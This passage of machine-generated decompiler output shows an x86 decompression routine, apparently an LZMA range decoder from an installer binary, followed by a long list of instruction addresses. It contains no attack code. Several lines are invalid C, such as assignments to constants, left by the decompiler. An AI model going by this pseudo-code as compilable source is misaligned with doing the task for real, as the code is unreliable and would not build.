											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
